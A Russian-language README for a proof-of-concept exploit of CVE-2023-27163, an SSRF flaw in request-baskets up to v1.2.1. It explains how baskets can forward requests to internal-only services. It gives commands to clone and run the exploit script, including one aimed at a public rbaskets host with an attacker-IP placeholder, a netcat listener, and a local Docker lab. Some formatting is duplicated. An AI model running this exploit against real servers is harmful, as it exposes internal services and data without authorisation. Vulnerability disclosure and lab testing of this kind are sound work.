
Доказательство концепции для Server Side Request Forgery (SSRF) в request-baskets (V<= v.1.2.1)
Этот репозиторий содержит доказательство концепции (PoC) для CVE-2023-27163 — уязвимости подделки запросов на стороне сервера (Server-Side Request Forgery, SSRF), обнаруженной в request-baskets вплоть до версии 1.2.1. Данная уязвимость позволяет злоумышленникам получать доступ к сетевым ресурсам и конфиденциальной информации, эксплуатируя компонент /api/baskets/{name} с помощью специально сформированного API-запроса.
git clone https://github.com/MasterCode112/CVE-2023-27163.git
bash ./CVE-2023-27163.sh https://rbaskets.in/ <attacker IP>
Request-baskets — это веб-приложение, предназначенное для сбора и регистрации запросов по определённому маршруту, так называемой корзине (basket). При её создании пользователь может указать другой сервер для пересылки запроса. Проблема здесь в том, что пользователь может указать не предназначенные для этого сервисы, например приложения, закрытые от внешней сети.
Например, предположим, что на сервере размещены Request-baskets (порт 55555) и веб-сервер Flask на порту 8000. Flask также настроен на взаимодействие только с localhost. Создав корзину, которая пересылает запросы на http://localhost:8000, злоумышленник может получить доступ к ранее ограниченному веб-серверу Flask.

docker run -p 55555:55555 darklynx/request-baskets:v1.2.1
``` git clone https://github.com/MasterCode112/CVE-2023-27163.git
2. Скачайте PoC
```shell
git clone https://github.com/MasterCode112/CVE-2023-27163.git
nc -lvp 8000
DOCKER_IP=$(ifconfig docker0 | grep inet | head -n 1 | awk '{ print $2 }')
./CVE-2023-27163.sh http://127.0.0.1:55555/ http://$DOCKER_IP:8000/